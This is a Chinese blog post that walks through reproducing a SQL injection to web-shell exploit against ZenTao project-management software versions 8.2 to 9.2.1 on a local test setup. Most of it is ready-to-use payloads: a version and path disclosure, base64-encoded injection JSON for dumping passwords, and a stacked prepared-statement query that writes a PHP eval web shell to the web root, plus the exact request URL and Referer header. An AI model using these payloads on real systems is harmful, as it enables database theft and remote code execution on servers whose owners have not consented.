Se7en's Blog|Learn and live

禅道8.2-9.2.1注入GetShell

字数统计: 346阅读时长: 1 min
2018/11/26 Share

5

漏洞分析

先附上某老哥的漏洞分析,来了解下原理。

漏洞复现

查看版本

我这里用的官方集成环境版本8.4

获取版本号:/index.php?mode=getconfig

1

绝对路径

获取绝对路径:网址后面随便输入什么就会爆出绝对路径

2

没路径的报错exp:

1
{"orderBy":"order limit 1,1 PROCEDURE ANALYSE(polygon(id),1)#","num":"1,1","type":"openedbyme"}

base64加密:

1
eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMSwxIFBST0NFRFVSRSBBTkFMWVNFKHBvbHlnb24oaWQpLDEpIyIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0=

EXP

提交地址:http://127.0.0.1:81/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=base64

※exp需要base64加密后才能提交,且回显、写Shell须加上Referer:http://127.0.0.1:81/zentao/

注入显密码:

1
{"orderBy":"order limit 1;#","num":"1,1","type":"openedbyme"}

base64加密:

1
eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTsjIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ==

不知道什么原因,本地复现无账号密码回显。。。

3

前台GetShell:

1
{"orderBy":"order limit 1;SET @SQL=0x73656C65637420273C3F70687020406576616C28245F504F53545B785D293F3E2720696E746F206F757466696C652027443A2F7A656E74616F2F78616D70702F7A656E74616F2F7777772F6861636B2E70687027;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}

其中有部分使用了MySQL的预处理查询绕过程序的过滤:

导出shell:

1
select '<?php @eval($_POST[x])?>' into outfile 'D:/zentao/xampp/zentao/www/hack.php'

HEX编码:(注意加密解密都不带0x,但是EXP中需要加上)

1
73656C65637420273C3F70687020406576616C28245F504F53545B785D293F3E2720696E746F206F757466696C652027443A2F7A656E74616F2F78616D70702F7A656E74616F2F7777772F6861636B2E70687027

base64加密:

1
eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2QzY1NjM3NDIwMjczQzNGNzA2ODcwMjA0MDY1NzY2MTZDMjgyNDVGNTA0RjUzNTQ1Qjc4NUQyOTNGM0UyNzIwNjk2RTc0NkYyMDZGNzU3NDY2Njk2QzY1MjAyNzQ0M0EyRjdBNjU2RTc0NjE2RjJGNzg2MTZENzA3MDJGN0E2NTZFNzQ2MTZGMkY3Nzc3NzcyRjY4NjE2MzZCMkU3MDY4NzAyNztQUkVQQVJFIHBvcmQgRlJPTSBAU1FMO0VYRUNVVEUgcG9yZDstLSAtIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ==

访问之即可在目录下生成hack.php:

4

CATALOG
  1. 1. 漏洞分析
  2. 2. 漏洞复现
    1. 2.1. 查看版本
    2. 2.2. 绝对路径
    3. 2.3. EXP
      1. 2.3.1. 注入显密码:
      2. 2.3.2. 前台GetShell: